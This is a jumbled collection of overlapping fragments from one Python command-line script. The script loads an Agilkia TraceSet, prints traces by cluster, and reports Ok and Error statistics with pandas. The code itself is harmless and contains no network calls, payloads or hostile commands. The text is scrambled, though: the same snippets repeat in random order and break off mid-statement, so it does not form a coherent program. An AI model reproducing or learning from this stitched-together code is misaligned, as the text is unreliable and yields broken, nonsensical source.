mapfile", "statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head())", "a table of Actions showing how many got Ok vs Error.\"\"\" good =", "= df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number", "color_status=args.status)) if 
args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for action,ch in", "events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red, to highlight", "print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event", "import Path import textwrap import agilkia INDENT = \" \" # prefix for", "two columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given", "= df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}%", "some general statistics. If the TraceSet is clustered, traces will be displayed in", "ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\")", "table of Actions showing how many got Ok vs Error.\"\"\" good = df[df.Status", "== c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status))", "Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data =", ": ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \")) if __name__ == \"__main__\": main()", "pathlib import Path import textwrap import agilkia INDENT = \" \" # prefix", "= dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\",", "df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\")", "Path import textwrap import agilkia INDENT = \" \" # prefix for each", "= [] if args.repeats is None else [args.repeats] if traceset.is_clustered() and not 
args.noclusters:", "tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr", "success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args", "<EMAIL> \"\"\" import pandas as pd import argparse from pathlib import Path import", "represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\")", "print(\"==== statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 *", "an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\",", "as pd import argparse from pathlib import Path import textwrap import agilkia INDENT", "traces will be displayed in clusters, by default. TODO: allow user to specify", "file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\")", "trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events :", "args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume this has just two columns:", "Agilkia traceset file (*.json)\") args = parser.parse_args() # print(f\"Args are:\", args) traceset =", "def main(): \"\"\"A command line program that prints a set of traces, plus", "\"\"\" View the traces within an Agilkia TraceSet. 
It prints a one-line summary", "action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red, to highlight errors\", action=\"store_true\")", "{traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)),", "if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster", "(plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame,", "type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args() # print(f\"Args are:\",", "many got Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status", "====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0)", "of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \")) if __name__ ==", "print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s}", "args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr)", "Totals row at bottom return pd.concat([data, totals]) def main(): \"\"\"A command line program", "ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok", "default. TODO: allow user to specify the 'Ok' status value (e.g. 
--ok=200 for", "repeats = [] if args.repeats is None else [args.repeats] if traceset.is_clustered() and not", "print(\"final map=\", char_map) repeats = [] if args.repeats is None else [args.repeats] if", "make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of Actions", "to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents success (default", "# print(\"final map=\", char_map) repeats = [] if args.repeats is None else [args.repeats]", "args.repeats is None else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters()", "action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses", "ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts()", "import pandas as pd import argparse from pathlib import Path import textwrap import", "====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics", "action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents success (default 0).\", default=\"0\", metavar=\"NUM\",", "Actions showing how many got Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size()", "DataFrame, creates a table of Actions showing how many got Ok vs Error.\"\"\"", "print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \"", "textwrap import agilkia INDENT = \" \" # prefix for each trace (plus", "user to specify the 'Ok' status value (e.g. 
--ok=200 for HTTP results) @author:", ": {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df,", "plus some general statistics. If the TraceSet is clustered, traces will be displayed", "df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\")", "def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of", "View the traces within an Agilkia TraceSet. It prints a one-line summary of", "percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of traces", "If the TraceSet is clustered, traces will be displayed in clusters, by default.", "at bottom return pd.concat([data, totals]) def main(): \"\"\"A command line program that prints", "traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\",", "1=char. 
char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) #", "(*.json)\") args = parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions =", "print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if", "print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose:", "traceset file (*.json)\") args = parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset))", "this has just two columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:,", "statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace", "\"\"\" import pandas as pd import argparse from pathlib import Path import textwrap", "!= ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] =", "parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars:", "enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces:", "repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red, to", "== ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err})", "parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated 
events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero", "pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of Actions showing", "None else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for c", "command line program that prints a set of traces, plus some summary statistics.\"\"\"", "assume this has just two columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0],", "in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i] == c:", "displayed in clusters, by default. TODO: allow user to specify the 'Ok' status", "for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\")", "print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories", "TODO: allow user to specify the 'Ok' status value (e.g. --ok=200 for HTTP", "is clustered, traces will be displayed in clusters, by default. 
TODO: allow user", "inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals", "event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts", "0) / df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length", "color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event", "event chars ====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\")", "traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if", "char_map) repeats = [] if args.repeats is None else [args.repeats] if traceset.is_clustered() and", "@author: <EMAIL> \"\"\" import pandas as pd import argparse from pathlib import Path", "vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data", ": {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number", "0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map)", "pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals", "# we assume this has just two columns: 0=action_name and 1=char. 
char_map =", "the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char map.\")", "map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\",", "range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT,", "data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at", "char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final", "# print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number", "from pathlib import Path import textwrap import agilkia INDENT = \" \" #", "with non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value", "events with non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status", "space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table", "plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information,", "action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view", "as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char", "{df.shape[0]}\") print(f\"Number of event 
kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok", "traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more", "print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile =", "help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without", "for each trace (plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame:", "traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df =", "extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a", "traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = [] if args.repeats is None else", "print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = [] if args.repeats", "import argparse from pathlib import Path import textwrap import agilkia INDENT = \"", "error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors : ({100.0 -", "parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the event-to-char", "= agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume this has", "= traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces):", "utf-8 -*- 
\"\"\" View the traces within an Agilkia TraceSet. It prints a", "non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that", "the TraceSet is clustered, traces will be displayed in clusters, by default. TODO:", "data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add", "100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\")", "= argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the event-to-char map.\",", "Agilkia TraceSet. It prints a one-line summary of each trace, plus some general", "formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\",", "{df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of", "TraceSet is clustered, traces will be displayed in clusters, by default. 
TODO: allow", "agilkia INDENT = \" \" # prefix for each trace (plus one extra", "+ data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return pd.concat([data,", "status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors", "args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None)", "totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return pd.concat([data, totals]) def", "traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\")", "traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars()", "[args.repeats] if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()):", "= pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return pd.concat([data, totals]) def main():", "= traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0]", "\"--eventchars\", help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order,", ": {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of", ": {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors :", "# print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = [] if", "of 
event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\")", "metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args() # print(f\"Args", "for (i, tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else:", "HTTP results) @author: <EMAIL> \"\"\" import pandas as pd import argparse from pathlib", "pd.concat([data, totals]) def main(): \"\"\"A command line program that prints a set of", "action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with", "default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args() #", "err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) #", "agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume this has just", "print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events", "each trace, plus some general statistics. 
If the TraceSet is clustered, traces will", "--ok=200 for HTTP results) @author: <EMAIL> \"\"\" import pandas as pd import argparse", "dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map)", "set of traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\",", "clustered, traces will be displayed in clusters, by default. TODO: allow user to", "got Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status !=", "print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \")) if __name__", "# prefix for each trace (plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0)", "mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats =", "has just two columns: 0=action_name and 1=char. 
char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1]))", "status value that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia", "argparse from pathlib import Path import textwrap import agilkia INDENT = \" \"", "# add Totals row at bottom return pd.concat([data, totals]) def main(): \"\"\"A command", "not args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i,", "= data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom", "map=\", char_map) repeats = [] if args.repeats is None else [args.repeats] if traceset.is_clustered()", "such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an", "print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok", "of traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show", "traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0] #", "help=\"show more information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv", "one-line summary of each trace, plus some general statistics. 
If the TraceSet is", "[] if args.repeats is None else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters", "char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = [] if args.repeats is None", "statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok,", "1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = []", "highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents success (default 0).\",", "else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for c in", "= traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df", "parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\",", "program that prints a set of traces, plus some summary statistics.\"\"\" parser =", "{c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status))", "are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars,", "good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\":", "help=\"specify the status value that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\",", "value (e.g. 
--ok=200 for HTTP results) @author: <EMAIL> \"\"\" import pandas as pd", "\" \" # prefix for each trace (plus one extra space) def make_action_status_table(df:", "clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events", "argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the event-to-char map.\", action=\"store_true\")", "= pd.read_csv(args.eventchars, header=None) # we assume this has just two columns: 0=action_name and", "be displayed in clusters, by default. TODO: allow user to specify the 'Ok'", "= df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\")", "totals]) def main(): \"\"\"A command line program that prints a set of traces,", "the traces within an Agilkia TraceSet. It prints a one-line summary of each", "chars ====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"====", "how many got Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err =", "just two columns: 0=action_name and 1=char. 
char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) #", "print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok :", "kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts =", "results) @author: <EMAIL> \"\"\" import pandas as pd import argparse from pathlib import", "traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) #", "the status value that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an", "header=None) # we assume this has just two columns: 0=action_name and 1=char. char_map", "length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\")", "bottom return pd.concat([data, totals]) def main(): \"\"\"A command line program that prints a", "clusters, by default. TODO: allow user to specify the 'Ok' status value (e.g.", "print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats,", "* statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average", "by default. TODO: allow user to specify the 'Ok' status value (e.g. 
--ok=200", "return pd.concat([data, totals]) def main(): \"\"\"A command line program that prints a set", "0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args()", "if len(error_counts) > 1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts),", "df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"]", "\"\"\"A command line program that prints a set of traces, plus some summary", "we assume this has just two columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:,", "print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of", "c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if", "trace, plus some general statistics. If the TraceSet is clustered, traces will be", "within an Agilkia TraceSet. It prints a one-line summary of each trace, plus", "prefix for each trace (plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) ->", "'Ok' status value (e.g. 
--ok=200 for HTTP results) @author: <EMAIL> \"\"\" import pandas", "{len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of", "showing how many got Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err", "\"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with", "\"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")])", "data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok +", "print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters", "with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red, to highlight errors\",", "errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \")) if __name__ == \"__main__\":", "ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of Actions showing how", "help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args() # print(f\"Args are:\", args) traceset", "of events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \"))", "import textwrap import agilkia INDENT = \" \" # prefix for each trace", "clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in", "> 1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \"))", "INDENT = \" \" # prefix for each trace (plus one 
